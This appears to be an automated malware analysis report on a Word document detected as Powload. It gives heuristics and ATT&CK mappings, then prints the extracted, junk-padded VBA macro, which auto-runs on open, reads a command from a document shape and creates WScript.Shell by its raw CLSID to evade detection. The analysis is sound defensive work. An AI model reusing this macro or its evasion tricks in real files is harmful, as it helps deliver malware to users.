Verdict: MALICIOUS (risk score 242)
Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1218.011 System Binary Proxy Execution: Rundll32
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
A critical heuristic fired: the VBA macro instantiates the execution-capable COM class WScript.Shell by its raw CLSID (72C24DD5-D70A-438B-8A42-98424B88AFB8) through a GetObject("new:...") moniker instead of CreateObject("WScript.Shell"), which sidesteps signatures keyed on the ProgID string. The AutoOpen procedure runs as soon as the document is opened; its real logic is padded with junk Select Case/For Each arithmetic, and the command string it assembles is not in the code at all but is read at runtime from the text of the document shape "VzjnhsrIM" (Shapes("VzjnhsrIM").TextFrame.TextRange.Text). The extracted macro therefore does not reveal the payload by itself; recovering it means dumping that shape's text from the document. An auto-execution entry point combined with a WScript.Shell instance built at runtime is a strong indicator of arbitrary command execution, and the ClamAV Powload family name points to a macro downloader that fetches a further payload, consistent with the Rundll32 and Windows Command Shell ATT&CK mappings above.
Heuristics (7)
- ClamAV: Doc.Malware.Powload-6826398-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6826398-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. In this sample the CLSID is passed without braces and the literal is padded with concatenated empty variables; the moniker resolves to WScript.Shell either way.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Generic rule text: for this sample a VBA project was in fact recovered, see the extracted macros.bas below.)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI, a benign artifact of the embedded drawing shape that the macro reads its command from, not a download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6864 bytes | 9919beb3755bd4a9f8b5bf1737e16be57d0380ea3d20b23e692f2063a020b56a |

Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "BzODzkBN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case DNwiwGc
Case 110562042
DjJAj = CBool(TjZVff)
afYsjf = 199118286
Case 120143625
QffEv = Atn(KJooWPo)
kznXhq = Atn(117020577 * CLng(122217114))
End Select
For Each zjmTJDW In moBQiUcQr
QhrJElQ = uwIwbkzB * CDate(UJHAGRrj * nwGdKGq) * BlnpiA / Sin(WIaop) / QScoHH + 232769689 - 138574424 + Chr(66955860) + (zZiwRj * lBGHiM)
Next
On Error Resume Next
Select Case sZOGIrlu
Case 326949927
FAHVjV = CBool(OYwJJtLw)
bXuMfnq = 308315021
Case 337489584
WjrYcwOju = Atn(zihKCqQq)
jfCJfPN = Atn(2016227 * CLng(243991620))
End Select
For Each RKMWmwBX In TNvJQRjtp
KoWzXQPT = LJOvdAc * CDate(kMvMAT * XKnVlr) * WYQauuLpG / Sin(fbLpERS) / nwvhu + 155972209 - 60166520 + Chr(140540184) + (bNcth * MmqfCFiI)
Next
On Error Resume Next
Select Case zMmkj
Case 295643358
TctjhIY = CBool(GEIsG)
NHCiL = 71604706
Case 178241520
VzNEq = Atn(BzfXM)
hwcGBF = Atn(39082547 * CLng(26556637))
End Select
For Each DXrhFj In kBUiz
HwWdRS = GYlfr * CDate(PivjFEX * SZWWkVvPi) * iQWrj / Sin(YomAGimL) / jUaoUOda + 102365760 - 269160415 + Chr(147773796) + (GjzHruiBa * XzKIRRWpn)
Next
On Error Resume Next
Select Case EiBSREr
Case 325842126
rqljBawsb = CBool(FzwJKdrcq)
UmiaA = 322803614
Case 3130424
GOsvSoDI = Atn(LTMiwiiXa)
ZqpZc = Atn(8554190 * CLng(301751895))
End Select
For Each EHKjEaI In NBKhJGBi
IdZWDzCZ = bwQoPuYMw * CDate(ofOlV * VhNtwS) * LtTXUFBI / Sin(GNzLU) / lQIwHAp + 334188 - 303112609 + Chr(290623796) + (JiSpj * IIFuwWEGz)
Next
Set qIEizqDtN = Shapes("VzjnhsrIM")
On Error Resume Next
Select Case IobOq
Case 243120048
bIiur = CBool(kZBmNGkj)
qNpXcrNCG = 163039656
Case 211696002
HoJomzB = Atn(zMzhqEh)
BsvfaK = Atn(324205783 * CLng(91393562))
End Select
For Each TIJOGYV In Oclswb
jMwiP = jXKzB * CDate(dAvzqv * TprJso) * WccvYCR / Sin(wOMTwQmk) / RFKsLSfuw + 226151421 - 52459493 + Chr(122108316) + (CFpnlEvPY * wqDjlXzzj)
Next
GMHWrbwzU = "" + UFLGd + ndjLJwAb + ipjsHOB + qIEizqDtN.TextFrame.TextRange.Text + uWwiaNz + LDauwO
On Error Resume Next
Select Case lwVWVv
Case 237648596
rDPpUr = CBool(fPLYnDC)
CsInBQXG = 57381375
Case 126063267
BUmhRvlb = Atn(YQUvXzhw)
ZBHjJS = Atn(198563354 * CLng(91908911))
End Select
For Each iDUzG In fpItitd
cQOmX = PCjZpj * CDate(iSKTDD * DXRaJwQi) * oQXvziSvj / Sin(BrjUu) / XEzWz + 167871519 - 199837746 + Chr(271242100) + (wEwocZwhL * IRnSDzPnz)
Next
Set lOUdzj = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + WDXSmtTMt + liGAaT + DjFKV + lqjltWh)
On Error Resume Next
Select Case CTRqY
Case 19269407
qJaXpu = CBool(XDfFDRmV)
DnYUPUuzj = 149632523
Case 125943163
pIwmZ = Atn(FCzCCqbi)
KwqwVjZ = Atn(89050481 * CLng(22134342))
End Select
For Each hBVPc In TblhvjSd
jTwBkht = vjztZzUQ * CDate(vmrnknUPj * qwdifN) * pNcMST / Sin(QafdttdR) / Aljlpw + 213605158 - 182501544 + Chr(250228584) + (SCoRF * jGIGni)
Next
On Error Resume Next
Select Case cPamI
Case 74826956
QvziiH = CBool(PNzLk)
sLFIQJGU = 51358557
Case 112378627
NnJKFks = Atn(zvSWn)
BJHQQKcbk = Atn(80304901 * CLng(115112302))
End Select
For Each SVwFzI In dVvwsKd
Anqao = ROAwDr * CDate(slDzs * SWLszJsJV) * LOGnD / Sin(otmdtAG) / GuRYljsBz + 101982266 - 71565132 + Chr(245146613) + (vtQwHwIp *
... (truncated)